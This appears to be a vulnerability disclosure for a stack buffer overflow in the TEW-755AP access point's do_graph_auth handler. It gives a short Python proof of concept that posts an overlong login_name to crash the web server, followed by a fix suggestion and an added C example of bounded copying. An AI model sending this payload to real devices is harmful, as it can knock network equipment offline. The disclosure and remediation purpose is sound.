We found a stack buffer overflow vulnerability in the **TEW-755AP** (firmware version TEW755AP-FW113B01.bin).
In the handler function for the action do_graph_auth (sub_4061E0) in the file /www/cgi/ssi, the value of login_name is copied directly into a stack buffer without a size check. An attacker can overflow the stack buffer by supplying a very long string as login_name.
PoC:

```python
import requests

# Device address used during testing; adjust to the device under test.
url = "http://192.168.17.221:80/apply_sec.cgi"
# Cookie given as name -> value; requests sends it as "Cookie: uid=1234".
cookie = {"uid": "1234"}
data = {"action": "do_graph_auth",
        # overlong login_name: 0xc50-48 bytes, far larger than the stack buffer
        "login_name": "a" * (0xc50 - 48)}
response = requests.post(url, cookies=cookie, data=data)
print(response.text)
print(response)
```
We use Python to send a crafted HTTP POST request to the web server and print the response.
When the crafted request is sent to the server, it returns a 502 error code.
Fix Suggestion:
Use strncpy (or another length-bounded copy) to avoid the buffer overflow.
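As an added example that is not part of the original advisory and not the vendor's firmware code, the following C shows the fix suggestion applied to a hypothetical do_graph_auth handler. The names copy_login_name, do_graph_auth_checked and LOGIN_NAME_MAX are assumptions, and the real buffer size inside sub_4061E0 is not given on the page. The example goes a little beyond the one-line suggestion: it rejects an overlong login_name instead of silently truncating it, and it NUL-terminates explicitly, because strncpy on its own leaves the destination unterminated when the source fills the buffer.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size; the actual size in the firmware is not known. */
#define LOGIN_NAME_MAX 64

/* Hardened copy of the login_name parameter into a fixed-size buffer.
 * The pattern the advisory describes is an unbounded copy such as
 *     strcpy(buf, login_name);
 * which writes past buf when login_name is longer than the buffer.
 * This version copies at most dst_size-1 bytes, always terminates, and
 * returns -1 (instead of truncating) when the input does not fit. */
int copy_login_name(char *dst, size_t dst_size, const char *login_name)
{
    if (dst == NULL || login_name == NULL || dst_size == 0)
        return -1;

    /* strnlen stops at dst_size, so a huge input is never fully scanned. */
    size_t len = strnlen(login_name, dst_size);
    if (len >= dst_size)            /* no room left for the terminator */
        return -1;

    /* Length is known to fit, so strncpy cannot overflow; terminate
     * explicitly anyway so the result never depends on strncpy padding. */
    strncpy(dst, login_name, dst_size - 1);
    dst[dst_size - 1] = '\0';
    return 0;
}

/* Hypothetical handler for action=do_graph_auth. Returns 0 when the name
 * was accepted, -1 when it was rejected; a real handler would answer the
 * rejection with a 4xx response rather than crashing with a 502. */
int do_graph_auth_checked(const char *login_name)
{
    char buf[LOGIN_NAME_MAX];       /* same kind of fixed-size stack buffer */

    if (copy_login_name(buf, sizeof buf, login_name) != 0)
        return -1;

    /* ... authentication would continue using buf here ... */
    return 0;
}

int main(void)
{
    /* Constructed input of the same length the PoC uses (0xc50-48 bytes). */
    char overlong[0xc50 - 48 + 1];
    memset(overlong, 'a', sizeof overlong - 1);
    overlong[sizeof overlong - 1] = '\0';

    printf("short name accepted: %d\n", do_graph_auth_checked("admin"));
    printf("overlong name rejected: %d\n", do_graph_auth_checked(overlong));
    return 0;
}
```

The key point is the order of operations: measure the input with a bounded scan first, then copy only when it is known to fit. Replacing strcpy with strncpy but leaving out the terminator write would trade the overflow for a string that runs off the end of the buffer.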